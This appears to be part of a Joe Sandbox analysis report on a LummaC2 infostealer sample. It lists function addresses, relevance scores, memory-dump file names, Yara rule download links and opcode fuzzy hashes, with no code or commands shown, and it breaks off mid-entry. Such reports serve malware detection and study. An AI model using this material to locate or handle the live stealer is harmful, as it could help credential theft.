Instruction Fuzzy Hash: EBA1093110C7998FD3109B78948027EBFD29BDA324F188A1DE6D5873D2D6B9C94AC747

Function 009DDC50 Relevance: 1.5, Strings: 1, Instructions: 237COMMON

Download Yara Rule

Strings

8, xrefs: 009DDDA6

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: 8
API String ID: 0-4194326291
Opcode ID: d4cfede4acd6329daf06a149dab4b360b038440ad7de6e758ff8b5fc29bf8f2d
Instruction ID: 4e8311b141815d1424817031d05f37999a7298be7645b05de9b1cf0db70dedca
Opcode Fuzzy Hash: d4cfede4acd6329daf06a149dab4b360b038440ad7de6e758ff8b5fc29bf8f2d
Instruction Fuzzy Hash: BE71F73369A99047D728893C4C213AA7E934BE6330F2DCB6EE5F68B3E5D65948068351

Function 009EFEC0 Relevance: 1.5, Strings: 1, Instructions: 225COMMON

Download Yara Rule

Strings

8, xrefs: 009EFFF9

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: 8
API String ID: 0-4194326291
Opcode ID: 48b193afbe15bc39c63a50303dd810e09ea2431eba5ca0c3ca7cd81a35d65a52
Instruction ID: 0312707a9acebe9d85c5adb1da383325b131969c365f9b2c81f2383f7e3f654b
Opcode Fuzzy Hash: 48b193afbe15bc39c63a50303dd810e09ea2431eba5ca0c3ca7cd81a35d65a52
Instruction Fuzzy Hash: 55712627649AD547D329863C4C613BA7A874BD7330F2DCB6EE6F68B3E2D5694C068340

Function 009DA800 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

_, xrefs: 009DA8EC

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: 74d3f3cdc59c08b7cc4a4666df596ac4c28a1b8d00a1a68b9df65d907403d1b0
Instruction ID: 1d70a4227d63d64cf6a13595626b67bff4c67ac11ddc8ae9fd3b933921e3303e
Opcode Fuzzy Hash: 74d3f3cdc59c08b7cc4a4666df596ac4c28a1b8d00a1a68b9df65d907403d1b0
Instruction Fuzzy Hash: AC61EB5560469009DB6CDF748493377BAE6DF84308F1891BEC9A5CFA9BE938C1038787

Function 009FB813 Relevance: 1.4, Strings: 1, Instructions: 186COMMON

Download Yara Rule

Strings

,1, xrefs: 009FB9E3

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: ,1
API String ID: 0-24929940
Opcode ID: d1443ae86f5153ffc458b2be26776fb00a9fef8e58ad360819fdec1c21179ed9
Instruction ID: ebf16a7f3706bd8c08f0b4770c8e537cb1bff8fa58b0171808a4ed9b7dbee3d0
Opcode Fuzzy Hash: d1443ae86f5153ffc458b2be26776fb00a9fef8e58ad360819fdec1c21179ed9
Instruction Fuzzy Hash: 6C514A71610A154BCB1CCF78CC6167A7BE2FB9A304318457DC592DB3A2EB399813CB14

Function 009FE8D0 Relevance: 1.4, Strings: 1, Instructions: 166COMMON

Download Yara Rule

Strings

@, xrefs: 009FE9AB

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 6d007053c747df58904abdd8cea8a504c8d078c42a7dbb2b2f295cd4e4d500b8
Instruction ID: 9cb8a0e71c0102a8606bdfcdf8420ea84d914c2dd55e14e265b63b97fd8e92ed
Opcode Fuzzy Hash: 6d007053c747df58904abdd8cea8a504c8d078c42a7dbb2b2f295cd4e4d500b8
Instruction Fuzzy Hash: 484120B16043049BD714CF54CC91B7BB7A6FFC9318F18891CE6C54B2A1E774A910CB92

Function 009FDAA0 Relevance: 1.3, Strings: 1, Instructions: 92COMMON

Download Yara Rule

Strings

@, xrefs: 009FDAF0

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: a8a953a3e7849d9025c8efc132408191d4e47e6e5cf3df908e0b514b9706c0de
Instruction ID: 3fa2120411ee3f036bd3b1f1f5a7d9e5b2b7919b4477039227dd165b0a0996b3
Opcode Fuzzy Hash: a8a953a3e7849d9025c8efc132408191d4e47e6e5cf3df908e0b514b9706c0de
Instruction Fuzzy Hash: 4621D0B21093089FD310DF58D8C066BB7FAFBCA328F15892CE6D987250D735A915CB56

Function 009E8290 Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

$, xrefs: 009E8360

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: acd2f11f61254a87ec1e15927ce40bdee50d46d94d10f5e3d892eea0f646df28
Instruction ID: ad2257241de009674e4c2b268e4652a7b9df43a0909df9058955385217382d74
Opcode Fuzzy Hash: acd2f11f61254a87ec1e15927ce40bdee50d46d94d10f5e3d892eea0f646df28
Instruction Fuzzy Hash: 5E2166326583505BE314CF659C81B5BB7B6DBC1700F0AC82CA0D99B2C6D978C80A8752

Function 009FBC14 Relevance: 1.3, Strings: 1, Instructions: 37COMMON

Download Yara Rule

Strings

, xrefs: 009FBC25, 009FBC55, 009FBC71

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3019521637
Opcode ID: 361ae31826b6e41de906ee056833b426111ba4ad6010fc865352248da1232c03
Instruction ID: d20dc5ecd5cdd77c5d13e2c1b063275b813f2aae2b2475ed075458bf1f95d3f3
Opcode Fuzzy Hash: 361ae31826b6e41de906ee056833b426111ba4ad6010fc865352248da1232c03
Instruction Fuzzy Hash: CFF04420A145584FEBE08F7C94593BF77E0E716314F202DB8C65EE32D1DD2498824B08

Function 009FD140 Relevance: .8, Instructions: 757COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5f1a4d536c8a678a565691b7dfd001b8ea9d0eecbfb1fc9fa05d02273e384ba
Instruction ID: f71f2e637c0bf81b32570a8f7ecfc12f0e9cd4e6a07f054e06eea8c5cbbaf3e6
Opcode Fuzzy Hash: e5f1a4d536c8a678a565691b7dfd001b8ea9d0eecbfb1fc9fa05d02273e384ba
Instruction Fuzzy Hash: 7D22E131B09215CFC708CF68D89066AB3E2FF8A314F1A85ADD98587361D731AD57CB80

Function 009FD240 Relevance: .7, Instructions: 680COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01ada431590ee9f33d86f4435fdbac69e88e85b7319064620abc9adc63fde6a9
Instruction ID: e80171de69047864d9bcc0829dc9f91c63c308db1d8c5aea29d43ae92e340c0f
Opcode Fuzzy Hash: 01ada431590ee9f33d86f4435fdbac69e88e85b7319064620abc9adc63fde6a9
Instruction Fuzzy Hash: 8712E032B19215CFC708CF68D89066AB7E2FF8A314F1A85BDD58587361DA31AC57CB80

Function 009C2F40 Relevance: .7, Instructions: 671COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33961c265d2a186596222e1585103a0061e57e9def07a34f0af6c18c745a5c82
Instruction ID: 19d7d2c20e44fa0c6908735217b9e017f77bc7e4066dd8cbd2383cdd44c88289
Opcode Fuzzy Hash: 33961c265d2a186596222e1585103a0061e57e9def07a34f0af6c18c745a5c82
Instruction Fuzzy Hash: 4752A0719083858FCB15CF19C090BAABBE1BF89314F18C96DF89957351D778EA49CB82

Function 009C6660 Relevance: .7, Instructions: 665COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f79568149107cc860bdcae81b740396629b4a75d9a59d33cfa8b543fc5248e2
Instruction ID: d5455c931178d9e0ae8d984ca1a6f82db5d131eb5808416c3340e02494979106
Opcode Fuzzy Hash: 7f79568149107cc860bdcae81b740396629b4a75d9a59d33cfa8b543fc5248e2
Instruction Fuzzy Hash: 3B52C2B0D08B848FE735CB24C484BA7BBE5EB95314F14882DD5E706A83C379A985CB53

Function 009C7440 Relevance: .7, Instructions: 664COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e5480c954f944f2d77b15b2a4e6c9b00cb7734c87ff60cc96a3044481aca68b
Instruction ID: d772417245bca7a2cb88c33d9a66ce7668ad9ccb65e9d0cee3868f11686fc942
Opcode Fuzzy Hash: 4e5480c954f944f2d77b15b2a4e6c9b00cb7734c87ff60cc96a3044481aca68b
Instruction Fuzzy Hash: 6122A132A0C7158BC724DF58D881BABF3E6EFD4315F29892DD98697281D734A815CB83

Function 009FD320 Relevance: .6, Instructions: 614COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6f48f22169ff8f1c0ce96e0ed18152605b959869ad7191fa78452ab6c2f1d61
Instruction ID: d0305098645e7e696c38500685b7cebcd9ee96bbc0c246a3d3bd444d022be0c8
Opcode Fuzzy Hash: a6f48f22169ff8f1c0ce96e0ed18152605b959869ad7191fa78452ab6c2f1d61
Instruction Fuzzy Hash: 5C02E132B19215CFC708CF68D89066AB3E2FFCA314F1A85ADD58587361DB31AD56CB80

Function 009C3960 Relevance: .6, Instructions: 600COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49b4f0c6a0532d47623f13fec43c0d82d41a3ced849b5d8de0a55390a68844ea
Instruction ID: e25d84f31c9b693750688bf5b7b62c4fe6cfc738aa5bedb998a26d93347b5973
Opcode Fuzzy Hash: 49b4f0c6a0532d47623f13fec43c0d82d41a3ced849b5d8de0a55390a68844ea
Instruction Fuzzy Hash: 95320370914B118FC378CF29C590A6ABBF1BF85710B608A2ED69787E90D736F945CB12

Function 009DF700 Relevance: .6, Instructions: 589COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63de0685fb89c094d31dcc90c55a76e9c1e579945c15b047e36ed10998c930d0
Instruction ID: ee26a29f24f2c7f3c2bbd76e5dbef201e3bf2623248a13e7ea6fb2edcf4450ce
Opcode Fuzzy Hash: 63de0685fb89c094d31dcc90c55a76e9c1e579945c15b047e36ed10998c930d0
Instruction Fuzzy Hash: 49525AB0619B818ED325CB3C9815797BFE5AB5A324F084A9DE0EF873D2C7756001CB66

Function 009FD3B0 Relevance: .6, Instructions: 579COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5c9af4a906843b3286cf5dd41308f52bc5ea06b584125301eb8671a6b2ef4fa
Instruction ID: 5012a5996ddc862369f3c0018032bc02bf1d67418a73162446fefd7cb16487b3
Opcode Fuzzy Hash: f5c9af4a906843b3286cf5dd41308f52bc5ea06b584125301eb8671a6b2ef4fa
Instruction Fuzzy Hash: 57F1F532B19215CFC718CF28D89066AB7E2FFCA314F1A85ADD98597351DB31AD12CB80

Function 009FD450 Relevance: .6, Instructions: 567COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f13e3d6253cee68809cb6513d9b14341f4fdba9128c8a5e06c1a41e454a46d98
Instruction ID: 17b10bc3abcae7508eaf6558c145b487df30600a14f0c6d10ed8a9b11d29dda4
Opcode Fuzzy Hash: f13e3d6253cee68809cb6513d9b14341f4fdba9128c8a5e06c1a41e454a46d98
Instruction Fuzzy Hash: FAF1F832B19215CFC718CF28D89067AB7E2FFCA314F1A85ADD88597351DA35AD02CB91

Function 009F7790 Relevance: .5, Instructions: 506COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ab62cde40d8e6ab978e14c20f4f7efe41640ca5878f5f9bf3c08a7d48969c7d
Instruction ID: 2882e77e794bc04bc9715b79f65887d4e439c9d5b172f91b237e997aceb78427
Opcode Fuzzy Hash: 0ab62cde40d8e6ab978e14c20f4f7efe41640ca5878f5f9bf3c08a7d48969c7d
Instruction Fuzzy Hash: 0BE13432A083198BD714CF64C891A7BF7A2FBC5308F29892CEA9597355DB35EC06C791

Function 009ED110 Relevance: .5, Instructions: 480COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57b485d69cb840c9fe46ebf91d501c097f46c29b226d291c214e6d206a261882
Instruction ID: dfdef7a2e833ecf4866b53e84d5d830570db7ca7c99f3c30a741996277ff2fd9
Opcode Fuzzy Hash: 57b485d69cb840c9fe46ebf91d501c097f46c29b226d291c214e6d206a261882
Instruction Fuzzy Hash: E922E3F0A11B059FC3A9CF29D845B97BBE9EB89318F50491EE0AE87390C7716502CF95

Function 009E20C0 Relevance: .4, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abeefdcb793458b6b22bbd90136c727f6430660691b300c38c37718529a37917
Instruction ID: f6f699c93ad4a39e71284427108f66842c1d35d58c9a32ee4e4e64a6da7357ad
Opcode Fuzzy Hash: abeefdcb793458b6b22bbd90136c727f6430660691b300c38c37718529a37917
Instruction Fuzzy Hash: A7A14771A083509BDB21DF25C892B7BB3E9EF91724F18992CE8C587291E738DD058752

Function 009C5970 Relevance: .4, Instructions: 400COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6aba2e7236a2e9aceeb2528f5b0b9aaecc5cc82245fb39869df27382fd64ba8a
Instruction ID: 9a82f0df6e124dbf75d3b73dd42624c197153274421000742bf288c47140cdab
Opcode Fuzzy Hash: 6aba2e7236a2e9aceeb2528f5b0b9aaecc5cc82245fb39869df27382fd64ba8a
Instruction Fuzzy Hash: C5E167715087818FC720DF29C880B6BBBE5AF99300F448D2DE4D587752E675E988CB93

Function 009E6230 Relevance: .4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
